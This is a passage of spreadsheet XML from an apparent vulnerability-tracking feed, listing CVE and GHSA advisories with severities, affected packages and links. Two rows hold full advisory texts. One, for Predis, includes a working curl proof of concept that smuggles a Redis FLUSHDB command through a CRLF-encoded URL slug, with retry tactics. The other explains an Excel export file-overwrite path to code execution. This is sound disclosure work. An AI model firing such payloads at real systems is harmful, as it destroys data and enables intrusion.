    composer require predis/predis:3.2.0
    docker compose up -d
    php -S 127.0.0.1:8080 -t .
    curl 'http://127.0.0.1:8080/?seed'                       # 100 keys

Attack (smuggled `FLUSHDB` inside the slug):

    curl 'http://127.0.0.1:8080/?slug=PAD4%0D%0A*1%0D%0A%247%0D%0AFLUSHDB'

The slug's first line must hash to a different shard than the fake key `'key'`
(otherwise the truncated bytes swallow the injection and the request simply
404s). With two shards this is ~50% per attempt — retry `PAD0`, `PAD1`, … until
the request returns 500. More shards make the attack **easier**: the per-attempt
hit probability is `(N-1)/N`, so on production clusters with many shards the
first request succeeds with near-certainty.

Verified result: `dbsize` across both shards drops 100 → 62; one shard was wiped
by a `FLUSHDB` the application never issued (it only ever ran `GET`/`SET` on
normal keys). The fix was confirmed A/B: the same PoC wipes a shard on the parent
of commit `053cb4b6` and fails on `053cb4b6`.

### Impact

CWE-93 (Improper Neutralization of CRLF Sequences) leading to Redis command
injection / protocol smuggling and denial of service. Any application on
**predis/predis 3.0.0-RC1 – 3.2.0** that calls `pipeline()` on a cluster or
replication connection and includes attacker-influenced data (values **or**
keys — e.g. cache keys built from URL slugs) in the pipelined commands is
affected. This is a common pattern for cache lookups, sessions and queued
writes.

- **Cluster:** unauthenticated remote command injection — shard-wide cache wipe
  (`FLUSHDB`), targeted destruction (`DEL`), cache poisoning (`SET`), same-slot
  key theft (`GET`), node memory exhaustion (key flood), possible cluster outage
  (`CLUSTER FLUSHSLOTS`).
- **Replication:** reliable unauthenticated DoS on every affected request.

### Remediation

Upgrade to **predis/predis 3.3.0 or later**. The fix (PR #1586, commit
`053cb4b6`) makes pipelines on aggregate connections write each command using the
real `Command` object, eliminating the second, byte-splitting parser.

Users who cannot upgrade immediately should avoid calling `pipeline()` on
aggregate (cluster / replication) connections with any attacker-influenced keys
or values; there is no reliable in-application way to neutralize the embedded
`\r\n` while the second parser remains in the code path.</t></is></c><c r="S2409" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t></is></c></row><row r="2410"><c r="A2410" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2410" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2410" s="5" t="inlineStr"><is><t>CVE-2026-84373</t></is></c><c r="D2410" s="5" t="inlineStr" /><c r="E2410" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2410" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2410" s="5" t="inlineStr" /><c r="H2410" s="5" t="n"><v>0.004</v></c><c r="I2410" s="5" t="inlineStr" /><c r="J2410" s="5" t="inlineStr" /><c r="K2410" s="5" t="inlineStr" /><c r="L2410" s="5" t="inlineStr"><is><t>npm:@vitest/mocker, npm:vitest</t></is></c><c r="M2410" s="5" t="inlineStr"><is><t>4.1.11, 5.0.0-rc.2</t></is></c><c r="N2410" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2410" s="5" t="inlineStr" /><c r="P2410" s="5" t="inlineStr" /><c r="Q2410" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R2410"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S2410" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84373</t></is></c></row><row r="2411"><c r="A2411" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2411" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2411" s="5" t="inlineStr"><is><t>CVE-2026-84374</t></is></c><c r="D2411" s="5" t="inlineStr" /><c r="E2411" s="5" t="inlineStr" /><c r="F2411" s="5" t="inlineStr" /><c r="G2411" s="5" t="inlineStr" /><c r="H2411" s="5" t="n"><v>0.006</v></c><c r="I2411" s="5" t="inlineStr" /><c r="J2411" s="5" t="inlineStr" /><c r="K2411" s="5" t="inlineStr" /><c r="L2411" s="5" t="inlineStr"><is><t>composer:maatwebsite/excel</t></is></c><c r="M2411" s="5" t="inlineStr"><is><t>3.1.70</t></is></c><c r="N2411" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2411" s="5" t="inlineStr" /><c r="P2411" s="5" t="inlineStr" /><c r="Q2411" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R2411" s="5" t="inlineStr"><is><t>### Summary

`Excel::store()` resolved the destination path against the process working
directory rather than the configured filesystem disk. When that path resolved to
an existing file, the export was written straight to it with `fopen()`,
bypassing the disk entirely. An application that passes a user-controlled value
as the export path could therefore be made to overwrite an arbitrary existing
file that the PHP process can write to, with content the user controls.

### Details

`Maatwebsite\Excel\Files\Disk::copy()` contained two paths:

```php
if (realpath($destination)) {
    $tempStream = fopen($destination, 'rb+');
    $success    = stream_copy_to_stream($readStream, $tempStream) !== false;
} else {
    $success = $this-&gt;put($destination, $readStream);
}
```

`$destination` is the `$filePath` argument given to `Excel::store()`,
`$export-&gt;store()` or `-&gt;storeExcel()`. `realpath()` resolves it against the
**current working directory** — `public/` for a typical web request — not
against the disk root. On a hit, the write went directly to the filesystem and
never reached Flysystem, which would otherwise have rejected `../` traversal and
confined absolute paths to the disk root. The disk argument was effectively
ignored for those paths, including for remote disks such as S3.

Two consequences follow:

* the destination could be any existing file the PHP process can write, in or
  out of the disk root;
* the stream was opened `'rb+'`, which does not truncate, so a shorter export
  left trailing bytes of the previous file behind.

Because the file must already exist, the primitive is an **overwrite** rather
than an arbitrary file creation. Overwriting a PHP file that is reachable by the
web server (for example a front controller or a cached view) turns
attacker-controlled row content into code execution, since CSV and HTML writers
emit cell values verbatim. Passing an explicit writer type to `store()` bypasses
the extension-based type detection that would otherwise reject a `.php` target.

Exploitation requires the **application** to pass an unsanitized, user-controlled
value as the export path. Applications that pass a fixed or server-derived path
are not affected.

### Impact

Arbitrary overwrite of existing files writable by the PHP process, with
partially attacker-controlled content, leading to remote code execution where
the overwritten file is executed by the web server.

### Patches

Fixed in **3.1.70**. `Disk::copy()` now always writes through the configured
filesystem disk, so Flysystem enforces the disk root for every export.

Note the behaviour change: passing an absolute path to `store()` previously
wrote to that path once the file existed. Paths now always resolve relative to
the disk root. Applications that relied on that should configure a disk rooted
at the target location.

### Workarounds

For anyone unable to upgrade, validate the path before passing it to `store()` —
reject absolute paths and any `..` segment, or derive the filename server-side
and never build it from request input:

```php
$name = basename($request-&gt;input('filename'));   // strips any directory part
Excel::store($export, 'exports/' . $name, 'local');
```

### Credit

Reported responsibly by @seck19 via the contact address in `SECURITY.md`.</t></is></c><c r="S2411" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84374</t></is></c></row><row r="2412"><c r="A2412" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2412" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2412" s="5" t="inlineStr"><is><t>CVE-2026-84375</t></is></c><c r="D2412" s="5" t="inlineStr" /><c r="E2412" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2412" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2412" s="5" t="inlineStr" /><c r="H2412" s="5" t="n"><v>0.004</v></c><c r="I2412" s="5" t="inlineStr" /><c r="J2412" s="5" t="inlineStr" /><c r="K2412" s="5" t="inlineStr" /><c r="L2412" s="5" t="inlineStr"><is><t>npm:js-yaml</t></is></c><c r="M2412" s="5" t="inlineStr"><is><t>3.15.2, 4.3.2</t></is></c><c r="N2412" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2412" s="5" t="inlineStr" /><c r="P2412" s="5" t="inlineStr" /><c r="Q2412" s="5" t="inlineStr"><is><t>CWE-400, CWE-407</t></is></c><c r="R2412"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S2412" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t></is></c></row><row r="2413"><c r="A2413" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2413" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2413" s="5" t="inlineStr"><is><t>CVE-2026-84378</t></is></c><c r="D2413" s="5" t="inlineStr" /><c r="E2413" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2413" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2413" s="5" t="inlineStr" /><c r="H2413" s="5" t="n"><v>0.003</v></c><c r="I2413" s="5" t="inlineStr" /><c r="J2413" s="5" t="inlineStr" /><c r="K2413" s="5" t="inlineStr" /><c r="L2413" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M2413" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N2413" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2413" s="5" t="inlineStr" /><c r="P2413" s="5" t="inlineStr" /><c r="Q2413" s="5" t="inlineStr"><is><t>CWE-407</t></is></c><c r="R2413"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S2413" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84378</t></is></c></row><row r="2414"><c r="A2414" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2414" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2414" s="5" t="inlineStr"><is><t>CVE-2026-84379</t></is></c><c r="D2414" s="5" t="inlineStr" /><c r="E2414" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2414" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2414" s="5" t="inlineStr" /><c r="H2414" s="5" t="n"><v>0.003</v></c><c r="I2414" s="5" t="inlineStr" /><c r="J2414" s="5" t="inlineStr" /><c r="K2414" s="5" t="inlineStr" /><c r="L2414" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M2414" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N2414" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2414" s="5" t="inlineStr" /><c r="P2414" s="5" t="inlineStr" /><c r="Q2414" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R2414"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S2414" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84379</t></is></c></row><row r="2415"><c r="A2415" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2415" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2415" s="5" t="inlineStr"><is><t>CVE-2026-84380</t></is></c><c r="D2415" s="5" t="inlineStr" /><c r="E2415" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2415" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2415" s="5" t="inlineStr" /><c r="H2415" s="5" t="n"><v>0.002</v></c><c r="I2415" s="5" t="inlineStr" /><c r="J2415" s="5" t="inlineStr" /><c r="K2415" s="5" t="inlineStr" /><c r="L2415" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M2415" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N2415" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2415" s="5" t="inlineStr" /><c r="P2415" s="5" t="inlineStr" /><c r="Q2415" s="5" t="inlineStr"><is><t>CWE-444</t></is></c><c r="R2415"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S2415" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84380</t></is></c></row><row r="2416"><c r="A2416" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2416" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2416" s="5" t="inlineStr"><is><t>CVE-2026-84381</t></is></c><c r="D2416" s="5" t="inlineStr" /><c r="E2416" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2416" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2416" s="5" t="inlineStr" /><c r="H2416" s="5" t="n"><v>0.001</v></c><c r="I2416" s="5" t="inlineStr" /><c r="J2416" s="5" t="inlineStr" /><c r="K2416" s="5" t="inlineStr" /><c r="L2416" s="5" t="inlineStr"><is><t>pip:httpcore2, pip:httpx2</t></is></c><c r="M2416" s="5" t="inlineStr"><is><t>2.10.0</t></is></c><c r="N2416" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2416" s="5" t="inlineStr" /><c r="P2416" s="5" t="inlineStr" /><c r="Q2416" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="R2416"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S2416" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t></is></c></row><row r="2417"><c r="A2417" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2417" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2417" s="5" t="inlineStr"><is><t>CVE-2026-84382</t></is></c><c r="D2417" s="5" t="inlineStr" /><c r="E2417" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2417" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2417" s="5" t="inlineStr" /><c r="H2417" s="5" t="n"><v>0.004</v></c><c r="I2417" s="5" t="inlineStr" /><c r="J2417" s="5" t="inlineStr" /><c r="K2417" s="5" t="inlineStr" /><c r="L2417" s="5" t="inlineStr"><is><t>pip:httpx2</t></is></c><c r="M2417" s="5" t="inlineStr"><is><t>2.12.0</t></is></c><c r="N2417" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2417" s="5" t="inlineStr" /><c r="P2417" s="5" t="inlineStr" /><c r="Q2417" s="5" t="inlineStr"><is><t>CWE-409</t></is></c><c r="R2417"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S2417" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t></is></c></row><row r="2418"><c r="A2418" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2418" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2418" s="5" t="inlineStr"><is><t>CVE-2026-84445</t></is></c><c r="D2418" s="5" t="inlineStr" /><c r="E2418" s="5" t="inlineStr" /><c r="F2418" s="5" t="inlineStr" /><c r="G2418" s="5" t="inlineStr" /><c r="H2418" s="5" t="n"><v>0.007</v></c><c r="I2418" s="5" t="inlineStr" /><c r="J2418" s="5" t="inlineStr" /><c r="K2418" s="5" t="inlineStr" /><c r="L2418" s="5" t="inlineStr"><is><t>go:google.golang.org/grpc</t></is></c><c r="M2418" s="5" t="inlineStr"><is><t>1.82.2, 1.83.2, 1.85.0-dev.0.20260825072537-93e31b48545e</t></is></c><c r="N2418" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2418" s="5" t="inlineStr" /><c r="P2418" s="5" t="inlineStr" /><c r="Q2418" s="5" t="inlineStr"><is><t>CWE-129, CWE-248</t></is></c><c r="R2418"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S2418" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84445</t></is></c></row><row r="2419"><c r="A2419" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2419" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2419" s="5" t="inlineStr"><is><t>CVE-2026-85061</t></is></c><c r="D2419" s="5" t="inlineStr" /><c r="E2419" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2419" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2419" s="5" t="inlineStr" /><c r="H2419" s="5" t="n"><v>0.003</v></c><c r="I2419" s="5" t="inlineStr" /><c r="J2419" s="5" t="inlineStr" /><c r="K2419" s="5" t="inlineStr" /><c r="L2419" s="5" t="inlineStr"><is><t>npm:maplibre-gl</t></is></c><c r="M2419" s="5" t="inlineStr"><is><t>6.4.1</t></is></c><c r="N2419" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2419" s="5" t="inlineStr" /><c r="P2419" s="5" t="inlineStr" /><c r="Q2419" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2419"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S2419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t></is></c></row><row r="2420"><c r="A2420" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2420" s="5" t="inlineStr"><is><t>CVE-2026-86477</t></is></c><c r="D2420" s="5" t="inlineStr" /><c r="E2420" s="5" t="inlineStr" /><c r="F2420" s="5" t="inlineStr" /><c r="G2420" s="5" t="inlineStr" /><c r="H2420" s="5" t="inlineStr" /><c r="I2420" s="5" t="inlineStr" /><c r="J2420" s="5" t="inlineStr" /><c r="K2420" s="5" t="inlineStr" /><c r="L2420" s="5" t="inlineStr" /><c r="M2420" s="5" t="inlineStr" /><c r="N2420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2420" s="5" t="inlineStr" /><c r="Q2420" s="5" t="inlineStr" /><c r="R2420" s="5" t="inlineStr"><is><t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. Reason: This candidate was issued in error. Notes: All references and descriptions in this candidate have been removed to prevent accidental usage.</t></is></c><c r="S2420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86477</t></is></c></row><row r="2421"><c r="A2421" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2421" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2421" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D2421" s="5" t="inlineStr" /><c r="E2421" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2421" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2421" s="5" t="inlineStr" /><c r="H2421" s="5" t="inlineStr" /><c r="I2421" s="5" t="inlineStr" /><c r="J2421" s="5" t="inlineStr" /><c r="K2421" s="5" t="inlineStr" /><c r="L2421" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M2421" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N2421" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2421" s="5" t="inlineStr" /><c r="P2421" s="5" t="inlineStr" /><c r="Q2421" s="5" t="inlineStr"><is><t>CWE-125, CWE-787</t></is></c><c r="R2421"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S2421" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-26w7-cxv4-gfx2</t></is></c></row><row r="2422"><c r="A2422" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2422" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2422" s="5" t="inlineStr"><is><t>GHSA-2q33-cf8w-7q23</t></is></c><c r="D2422" s="5" t="inlineStr" /><c r="E2422" s="5" t="inlineStr" /><c r="F2422" s="5" t="inlineStr" /><c r="G2422" s="5" t="inlineStr" /><c r="H2422" s="5" t="inlineStr" /><c r="I2422" s="5" t="inlineStr" /><c r="J2422" s="5" t="inlineStr"><is><t>openssl</t></is></c><c r="K2422" s="5" t="inlineStr" /><c r="L2422" s="5" t="inlineStr"><is><t>nuget:Microsoft.Native.Quic.MsQuic.OpenSSL</t></is></c><c r="M2422" s="5" t="inlineStr" /><c r="N2422" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O2422" s="5" t="inlineStr" /><c r="P2422" s="5" t="inlineStr" /><c r="Q2422" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R2422" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-92f5-vc22-8j33. This link is maintained to preserve external references.

## Original Description

Use after free in Microsoft QUIC allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S2422" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2q33-cf8w-7q23</t></is></c></row><row r="2423"><c r="A2423" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2423" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2423" s="5" t="inlineStr"><is><t>GHSA-2q42-4q24-7rgv</t></is></c><c r="D2423" s="5" t="inlineStr" /><c r="E2423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2423" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2423" s="5" t="inlineStr" /><c r="H2423" s="5" t="inlineStr" /><c r="I2423" s="5" t="inlineStr" /><c r="J2423" s="5" t="inlineStr" /><c r="K2423" s="5" t="inlineStr" /><c r="L2423" s="5" t="inlineStr"><is><t>npm:@typespec/compiler, npm:@typespec/openapi3</t></is></c><c r="M2423" s="5" t="inlineStr" /><c r="N2423" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2423" s="5" t="inlineStr" /><c r="P2423" s="5" t="inlineStr" /><c r="Q2423" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R2423"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S2423" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2q42-4q24-7rgv</t></is></c></row><row r="2424"><c r="A2424" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2424" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2424" s="5" t="inlineStr"><is><t>GHSA-2x7j-588g-ccc2</t></is></c><c r="D2424" s="5" t="inlineStr" /><c r="E2424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2424" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2424" s="5" t="inlineStr" /><c r="H2424" s="5" t="inlineStr" /><c r="I2424" s="5" t="inlineStr" /><c r="J2424" s="5" t="inlineStr" /><c r="K2424" s="5" t="inlineStr" /><c r="L2424" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M2424" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N2424" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2424" s="5" t="inlineStr" /><c r="P2424" s="5" t="inlineStr" /><c r="Q2424" s="5" t="inlineStr"><is><t>CWE-400, CWE-407</t></is></c><c r="R2424"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S2424" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-2x7j-588g-ccc2</t></is></c></row><row r="2425"><c r="A2425" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2425" s="5" t="inlineStr"><is><t>GHSA-38hw-f37p-99jj</t></is></c><c r="D2425" s="5" t="inlineStr" /><c r="E2425" s="5" t="inlineStr" /><c r="F2425" s="5" t="inlineStr" /><c r="G2425" s="5" t="inlineStr" /><c r="H2425" s="5" t="inlineStr" /><c r="I2425" s="5" t="inlineStr" /><c r="J2425" s="5" t="inlineStr" /><c r="K2425" s="5" t="inlineStr" /><c r="L2425" s="5" t="inlineStr"><is><t>npm:i18nexus</t></is></c><c r="M2425" s="5" t="inlineStr" /><c r="N2425" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2425" s="5" t="inlineStr" /><c r="Q2425" s="5" t="inlineStr" /><c r="R2425"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2425" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16045</t></is></c></row><row r="2426"><c r="A2426" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2426" s="5" t="inlineStr"><is><t>GHSA-3j7p-44mj-76hx</t></is></c><c r="D2426" s="5" t="inlineStr" /><c r="E2426" s="5" t="inlineStr" /><c r="F2426" s="5" t="inlineStr" /><c r="G2426" s="5" t="inlineStr" /><c r="H2426" s="5" t="inlineStr" /><c r="I2426" s="5" t="inlineStr" /><c r="J2426" s="5" t="inlineStr" /><c r="K2426" s="5" t="inlineStr" /><c r="L2426" s="5" t="inlineStr"><is><t>npm:krdpass-auth-react-native</t></is></c><c r="M2426" s="5" t="inlineStr" /><c r="N2426" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2426" s="5" t="inlineStr" /><c r="Q2426" s="5" t="inlineStr" /><c r="R2426"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2426" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16042</t></is></c></row><row r="2427"><c r="A2427" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2427" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2427" s="5" t="inlineStr"><is><t>GHSA-4qhr-qf46-fcrx</t></is></c><c r="D2427" s="5" t="inlineStr" /><c r="E2427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F2427" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2427" s="5" t="inlineStr" /><c r="H2427" s="5" t="inlineStr" /><c r="I2427" s="5" t="inlineStr" /><c r="J2427" s="5" t="inlineStr" /><c r="K2427" s="5" t="inlineStr" /><c r="L2427" s="5" t="inlineStr"><is><t>nuget:Microsoft.DiaSymReader.Native</t></is></c><c r="M2427" s="5" t="inlineStr"><is><t>18.9.0-beta1.26405.2</t></is></c><c r="N2427" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2427" s="5" t="inlineStr" /><c r="P2427" s="5" t="inlineStr" /><c r="Q2427" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R2427"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S2427" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-4qhr-qf46-fcrx</t></is></c></row><row r="2428"><c r="A2428" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2428" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2428" s="5" t="inlineStr"><is><t>GHSA-57v5-wqx3-cgj4</t></is></c><c r="D2428" s="5" t="inlineStr" /><c r="E2428" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2428" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2428" s="5" t="inlineStr" /><c r="H2428" s="5" t="inlineStr" /><c r="I2428" s="5" t="inlineStr" /><c r="J2428" s="5" t="inlineStr" /><c r="K2428" s="5" t="inlineStr" /><c r="L2428" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M2428" s="5" t="inlineStr"><is><t>0.0.0-20260726004013-64c26e74bb82</t></is></c><c r="N2428" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2428" s="5" t="inlineStr" /><c r="P2428" s="5" t="inlineStr" /><c r="Q2428" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2428"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S2428" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-57v5-wqx3-cgj4</t></is></c></row><row r="2429"><c r="A2429" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2429" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C2429" s="5" t="inlineStr"><is><t>GHSA-8m3c-c648-2xjj</t></is></c><c r="D2429" s="5" t="inlineStr" /><c r="E2429" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F2429" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G2429" s="5" t="inlineStr" /><c r="H2429" s="5" t="inlineStr" /><c r="I2429" s="5" t="inlineStr" /><c r="J2429" s="5" t="inlineStr" /><c r="K2429" s="5" t="inlineStr" /><c r="L2429" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M2429" s="5" t="inlineStr"><is><t>9.1.1</t></is></c><c r="N2429" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O2429" s="5" t="inlineStr" /><c r="P2429" s="5" t="inlineStr" /><c r="Q2429" s="5" t="inlineStr"><is><t>CWE-73, CWE-918</t></is></c><c r="R2429"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S2429" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-8m3c-c648-2xjj</t></is></c></row><row r="2430"><c r="A2430" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2430" s="5" t="inlineStr"><is><t>GHSA-8rcc-9ggm-659p</t></is></c><c r="D2430" s="5" t="inlineStr" /><c r="E2430" s="5" t="inlineStr" /><c r="F2430" s="5" t="inlineStr" /><c r="G2430" s="5" t="inlineStr" /><c r="H2430" s="5" t="inlineStr" /><c r="I2430" s="5" t="inlineStr" /><c r="J2430" s="5" t="inlineStr" /><c r="K2430" s="5" t="inlineStr" /><c r="L2430" s="5" t="inlineStr"><is><t>npm:@usemosaik/template-react-js</t></is></c><c r="M2430" s="5" t="inlineStr" /><c r="N2430" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2430" s="5" t="inlineStr" /><c r="Q2430" s="5" t="inlineStr" /><c r="R2430"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2430" s="6" t="inlineStr"><is><t>https://osv.dev/vulnerability/MAL-2026-16047</t></is></c></row><row r="2431"><c r="A2431" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2431" s="5" t="inlineStr"><is><t>GHSA-9cfw-xh4g-cc2f</t></is></c><c r="D2431" s="5" t="inlineStr" /><c r="E2431" s="5" t="inlineStr" /><c r="F2431" s="5" t="inlineStr" /><c r="G2431" s="5" t="inlineStr" /><c r="H2431" s="5" t="inlineStr" /><c r="I2431" s="5" t="inlineStr" /><c r="J2431" s="5" t="inlineStr" /><c r="K2431" s="5" t="inlineStr" /><c r="L2431" s="5" t="inlineStr"><is><t>npm:i18nexus-tools</t></is></c><c r="M2431" s="5" t="inlineStr" /><c r="N2431" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O2431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2431" s="5" t="inlineStr" /><c r="Q2431" s="5" t="inlineStr" /><c 